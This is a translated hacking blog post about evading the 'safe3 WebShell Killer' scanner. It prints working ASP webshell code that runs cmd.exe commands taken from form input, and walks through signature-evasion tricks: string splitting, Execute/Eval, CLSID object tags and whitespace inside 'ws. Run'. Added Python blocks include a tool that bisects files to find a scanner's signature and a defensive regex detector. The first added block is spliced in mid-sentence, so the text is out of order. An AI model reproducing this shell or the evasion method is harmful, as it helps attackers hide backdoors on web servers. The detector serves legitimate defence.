A clever bypass of Web Anti-Virus

Source: Internet
Author: User

Today, with nothing to do, I was browsing the ghost blog and saw that the ghost had introduced a tool called "Web anti-virus v1.1". Its description reads: safe3 WebShell Killer is a completely green (portable) and free web-code scanning and removal tool, the first of its kind launched in China. Its unique intelligent scanning technology can effectively detect all kinds of webshells (ASP, PHP, JSP and ASPX), makes up for the inability of ordinary anti-virus software to fully detect and remove webshells, and is good news for webmasters. The tool's interface is shown in Figure 1. I personally think the interface is quite good, clean and easy to use, so I will not describe it further. It reminded me of a webshell I wrote a while ago: an ASP webshell so poorly written that only I use it. So I ran this tool against my own Trojan; the result is shown in Figure 2. Now I was curious: what signature string does this tool search for? Let's start testing.
In fact, the method for locating the signature in a text file is the same as for an EXE: copy part of the file's contents into a new file and scan that. If the new file is still flagged, the signature lies within that part, so keep narrowing the range until it is small enough to read the signature off. That is exactly what I did here. First I split my Trojan into two halves and put the first half into a new file for scanning. The result: no Trojan found, so the signature is in the second half. Putting the second half into the new file the same way gives the result in Figure 3: it is flagged. The next step is simply to repeat this: split the half that still carries the signature in two, put the first part into 1.asp, and if that is flagged the signature is in the first part, otherwise it is in the second. I will not waste everyone's time with every step; the final result is that the signature is roughly within this block:
If Request.Form("shellpath") <> "" Then ShellPath = Request.Form("shellpath")
If Request.Form("cmdec") <> "" Then
    DefCmd = Request.Form("cmdec")
    On Error Resume Next
    Set ws = Server.CreateObject("WScript.Shell")
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    szTempFile = Server.MapPath("cmd.txt")
    ' run the command through cmd.exe (ShellPath), hidden, and wait; output goes to the temp file
    Call ws.Run(ShellPath & " /c " & DefCmd & " > " & szTempFile, 0, True)
    Set fs = Server.CreateObject("Scripting.FileSystemObject")
    Set oFilelcx = fs.OpenTextFile(szTempFile, 1, False, 0)
    ' read the captured output back and HTML-encode it for display
    Aaa = Server.HTMLEncode(oFilelcx.ReadAll)
    oFilelcx.Close
    Call fs.DeleteFile(szTempFile, True)
End If
This block is the part that executes the CMD command, and the Trojan type the scanner reports is "ASP Command Execution Trojan", so this is almost certainly right. After repeated tests I narrowed the signature down to this one line:
Call ws.Run(ShellPath & " /c " & DefCmd & " > " & szTempFile, 0, True)
I changed "Run" to "RAN" and the file was no longer flagged. Now we have found the culprit; the next step is how to get rid of it.
The first thing that came to mind was to build the "Run" call as a string, so that the word run can be split in two and the string executed at run time. Concretely, change the code to:
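The splitting procedure above, written out as a small tool. This is an added example, not the article's code or the safe3 product: the scanner it drives is a constructed stand-in that flags one literal, consistent with what the article observes but not taken from the product, and the sample shell is constructed too. Rather than discarding one half of the file at each step, it binary-searches the left and right boundaries separately, so a signature that straddles the midpoint is not lost. It assumes the verdict is monotonic (a flagged string stays flagged when more of the file is added), which holds for a single literal or regex signature but not for scanners that score several indicators together.

```python
"""Locate the substring a signature scanner keys on, by bisection.

Added example, not the article's tool.  The scanner below is a constructed
stand-in that flags the literal "ws.Run(", which matches the article's
observations (changing "Run" to "RAN" or adding spaces makes the file pass);
the real product's signature database is unknown and nothing is taken from it.
"""

# Constructed sample: a trimmed ASP command-execution shell in the style of
# the one in the article (not the author's actual file).
SAMPLE_SHELL = """<%
If Request.Form("cmdec") <> "" Then
    DefCmd = Request.Form("cmdec")
    Set ws = Server.CreateObject("WScript.Shell")
    szTempFile = Server.MapPath("cmd.txt")
    Call ws.Run("cmd.exe /c " & DefCmd & " > " & szTempFile, 0, True)
End If
%>"""


def literal_scanner(text: str) -> bool:
    """Stand-in scanner: a single case-sensitive literal signature."""
    return "ws.Run(" in text


def locate_signature(text, is_flagged):
    """Return (start, end, scans) for the shortest flagged substring of text.

    Binary-searches the left boundary, then the right boundary.  Assumes the
    predicate is monotonic: any superstring of a flagged string is flagged.
    Returns None when the whole file is already clean.
    """
    scans = 0

    def flagged(s):
        nonlocal scans
        scans += 1
        return is_flagged(s)

    if not flagged(text):
        return None

    # Largest prefix that can be dropped: text[lo:] is flagged, text[hi:] is not.
    lo, hi = 0, len(text)
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if flagged(text[mid:]):
            lo = mid
        else:
            hi = mid
    start = lo

    # Smallest end: text[start:lo] is not flagged, text[start:hi] is.
    lo, hi = start, len(text)
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if flagged(text[start:mid]):
            hi = mid
        else:
            lo = mid
    end = hi
    return start, end, scans


def find_signature(text=SAMPLE_SHELL, is_flagged=literal_scanner) -> str:
    """The signature text itself, or '' when the file is not flagged."""
    located = locate_signature(text, is_flagged)
    if located is None:
        return ""
    start, end, _ = located
    return text[start:end]


if __name__ == "__main__":
    start, end, scans = locate_signature(SAMPLE_SHELL, literal_scanner)
    print(f"signature {SAMPLE_SHELL[start:end]!r} at {start}:{end} after {scans} scans")
```

Each boundary costs about log2(file length) scans, so even a large file needs a few dozen submissions to the scanner instead of the manual cut-and-test rounds described above. To run it against a real scanner, replace literal_scanner with a function that writes its argument to a file and invokes the scanner on it.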
<%
' "Run" never appears as one literal in the source; the statement is assembled and executed at run time
A = "Call ws.R" & "un(ShellPath & "" /c "" & DefCmd & "" > "" & szTempFile, 0, True)"
Execute A
%>
I thought this would be the breakthrough, but the file was still flagged; only the report changed, as shown in Figure 5, because the file is now classified as a different kind of Trojan. That is understandable, since "Execute" is now being used. So I tried "Eval" and "Server.Execute" as well and found that they are all flagged too. Then I thought of the classid method, since WScript.Shell can also be instantiated that way. Either of the following object tags gives the WScript.Shell object (use one of the two):
<Object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98417B88AFB8"></Object>
<Object runat="server" id="ws" scope="page" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></Object>
ws.Run ..................
But it is still detected, which was depressing. It seems the signature is centred on "*.run", whatever precedes the dot. That was a headache: the only way I could think of at the time was to remove this code altogether, which would make the shell pointless.
After thinking a while: since the scanner is watching for "*.run", what if I change it to "*. run"? Note the extra spaces here. First I had to test whether the ASP program still runs normally with them, and it does. After the change the CMD command still executes, as Figure 6 shows, and the web anti-virus tool no longer detects the Trojan. Our bypass has succeeded. I believe there must be other good methods as well. I will package the ASP shell and the tool; if you are interested, study them together with me! You are also welcome to contact me on the XFile Forum, where my ID is EchoEye.
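What the whitespace trick exploits, and a check that survives it, as an added example. This is my code, not the scanner's: the article never shows how safe3 matches, so the exact-literal stand-in below is an assumption consistent with the observations above, and the detection rules are mine. The literal check passes the spaced variant; a whitespace- and case-tolerant pattern on the tokens VBScript actually sees does not, and the Execute/Eval/Server.Execute and CLSID variants the author tried are caught by separate rules. The sample lines are constructed from the one line the author narrowed the signature to, and the two CLSIDs are copied from the object tags above.

```python
"""Literal-signature matching versus token-aware matching for the ws.Run case.

Added example, not the scanner's code.  The article shows that "ws.Run" is
matched as an exact literal, so "ws. Run" (extra spaces), "ws.RAN" and
"R" & "un" all slip past it.  The rules below are an assumption about how a
scanner should match, not a description of safe3's logic.
"""
import re

# VBScript is case-insensitive and tolerates whitespace around '.' and '(',
# so the patterns do too.  "\.\s*run\s*\(" fires on any <object>.Run( call,
# whatever the variable is named.
WSH_RUN = re.compile(r"\.\s*run\s*\(", re.IGNORECASE)
WSH_CREATE = re.compile(r'createobject\s*\(\s*"wscript\.shell"', re.IGNORECASE)
# CLSIDs the article used in <object> tags to obtain WScript.Shell without
# naming it (values copied from the article).
WSH_CLSIDS = ("72C24DD5-D70A-438B-8A42-98417B88AFB8",
              "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
# Dynamic code evaluation; the article found these flagged on their own.
DYNAMIC_EVAL = re.compile(
    r"\b(execute|executeglobal|eval)\b|server\s*\.\s*execute\b", re.IGNORECASE)


def literal_match(text: str) -> bool:
    """The exact-literal behaviour the article bypassed (constructed stand-in)."""
    return "ws.Run(" in text


def scan(text: str) -> list[str]:
    """Names of the rules that fire; an empty list means the text looks clean."""
    hits = []
    if WSH_RUN.search(text):
        hits.append("wsh-run-call")
    lowered = text.lower()
    if WSH_CREATE.search(text) or any(c.lower() in lowered for c in WSH_CLSIDS):
        hits.append("wsh-object")
    if DYNAMIC_EVAL.search(text):
        hits.append("dynamic-eval")
    return hits


# Constructed variants of the line the article narrowed the signature to.
ORIGINAL = 'Call ws.Run(ShellPath & " /c " & DefCmd & " > " & szTempFile, 0, True)'
SPACED = 'Call ws .  Run (ShellPath & " /c " & DefCmd & " > " & szTempFile, 0, True)'
SPLIT = 'A = "Call ws.R" & "un(ShellPath & "" /c "" & DefCmd, 0, True)"\nExecute A'
OBJECT_TAG = ('<Object runat="server" id="ws" scope="page" '
              'classid="clsid:72C24DD5-D70A-438B-8A42-98417B88AFB8"></Object>')
CLEAN = 'Response.Write Server.HTMLEncode(Request.Form("name"))'


if __name__ == "__main__":
    for label, sample in (("original", ORIGINAL), ("spaced", SPACED),
                          ("split+Execute", SPLIT), ("object tag", OBJECT_TAG),
                          ("clean", CLEAN)):
        print(f"{label:14} literal={literal_match(sample)!s:5} rules={scan(sample)}")
```

The split-string variant is the one a source-level pattern cannot see, which is why flagging the evaluation primitive itself, as the tool did, is the right fallback there; the cost is that legitimate pages using Execute or Eval need review. The ".Run(" rule will also fire on legitimate administrative pages that drive WScript.Shell, so treat it as an indicator to triage rather than a verdict.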
